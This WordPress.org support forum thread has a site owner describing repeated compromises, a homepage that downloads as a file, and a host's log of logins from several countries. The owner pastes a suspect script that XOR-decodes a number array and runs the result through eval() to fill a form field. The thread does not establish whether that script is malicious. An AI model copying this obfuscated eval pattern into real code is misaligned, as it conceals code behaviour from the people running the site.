WordPress.org

Forums

Site opens up in a text document (7 posts)

  1. lavalink
    Member
    Posted 3 years ago #

    Hi all,

    So I've dealt with two separate hacks in the past few months, and I thought I cleaned it all up. But today when I checked my website, when clicking through from Google, it didn't go the page. All it would do is ask me if I wanted to save a text document to my computer. When I checked the document it was some strange encrypted data - obviously yet another hack!!!

    I looked up the SERP page in Firebug and noticed that instead of having a clean link to my WordPress site it's been replaced by this strange URL - I took a screenshot of it, along with the next result, and how it should look: http://screencast.com/t/O4vImwWP

    I also tried typing in my site's URL directly, lavalinkonline.com, and the same thing happened, though after I cached it, it was loading properly.

    I cannot find any information online about this hack. Can anyone please point me in the right direction or make any suggestions?

    A thousand thanks

  2. lavalink
    Member
    Posted 3 years ago #

    Any suggestions please? Anyone heard of anything like this before?

  3. ClaytonJames
    Member
    Posted 3 years ago #

    It was only happening for me on your home page. (opening as an octet stream) In the course of poking about, the symptom stopped. Give it another try and see if it works for you now. It's opening for me correctly from Google search now, too.

  4. lavalink
    Member
    Posted 3 years ago #

    Yes but its happening to everyone who visits for the first time ;X Represents a serious problem if people have to refresh the page a few times just to view it.

    I'm not even sure where to look to fix this problem...

  5. ClaytonJames
    Member
    Posted 3 years ago #

    Just so we're on the same page: I cleared my browsers cache and revisited the site, (in more than one browser) so now, as a new visitor, the problem is no longer presenting itself for me. That makes me think it has nothing to do with the browser cache.

    My thoughts on this are: either this is an intermittent symptom (which if that is the case, you have not mentioned or have not noticed as of yet) or something server-side that has since been rectified.

    Did your hosts support team have any ideas about what could be causing your root directory to be served with the wrong content type (opening as an octet stream) rather than a web page ?

  6. lavalink
    Member
    Posted 3 years ago #

    Yes, I sent a support ticket to DreamHost, and they said that:

    Going through your user(s)' auth logs, I found the following which may be indicative of a password intrusion:

    - - - - - - - - - - - - - - - - - - - - - - -
    5 IPs have logged into user ### from 4 identified countries within the last 30 days, including:

    4 217.23.1.188 (Portugal)
    2 71.41.216.166 (United States)
    2 194.28.132.57 (Italy)
    1 204.12.247.66 (unknown)
    1 85.25.109.92 (Germany)

    This may indicate that your password has been compromised.
    - - - - - - - - - - - - - - - - - - - - - - -

    So it looks like I've been hacked again :( They gave me a long list of things to do to try to fix the issue, it seems like I have a lot of work to do... I wonder what it could be, that would affect ONLY the homepage?

  7. lavalink
    Member
    Posted 3 years ago #

    Ok, I checked the source code and there's a string that says "addLoadEvent" - could this possibly be the cause? There are a bunch of numbers in the middle which I don't recognize. It seems a little fishy. I've copied it below:

    <script type="text/javascript"><!--
    function addLoadEvent(func) {
    if( typeof jQuery != 'undefined' ) {
    jQuery(document).ready( func );
    } else if( typeof Prototype != 'undefined' ) {
    Event.observe( window, 'load', func );
    } else {
    var oldonload = window.onload;
    if (typeof window.onload != 'function') {
    window.onload = func;
    } else {
    window.onload = function() {
    if (oldonload)
    oldonload();

    func();
    }
    }
    }
    }
    function wphc(){
    var wphc_data = [1531626042,1447812648,1347731580,1464330303,1280427825,1124966201,408344106,1531758379,1078317571,168069756,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,253132924,236815211,1565955943,1448526376,1347731580,1497491519,1157925924,1347731580,1464330303,1280427825,51224377];

    for (var i=0; i<wphc_data.length; i++){
    wphc_data[i]=wphc_data[i]^941930332;
    }

    var a = new Array(wphc_data.length);
    for (var i=0; i<wphc_data.length; i++) {
    a[i] = String.fromCharCode(wphc_data[i] & 0xFF, wphc_data[i]>>>8 & 0xFF, wphc_data[i]>>>16 & 0xFF, wphc_data[i]>>>24 & 0xFF);
    }

    return eval(a.join(''));
    }
    addLoadEvent(function(){var el=document.getElementById('wphc_value');if(el)el.value=wphc();});
    //--></script>

Topic Closed

This topic has been closed to new replies.

About this Topic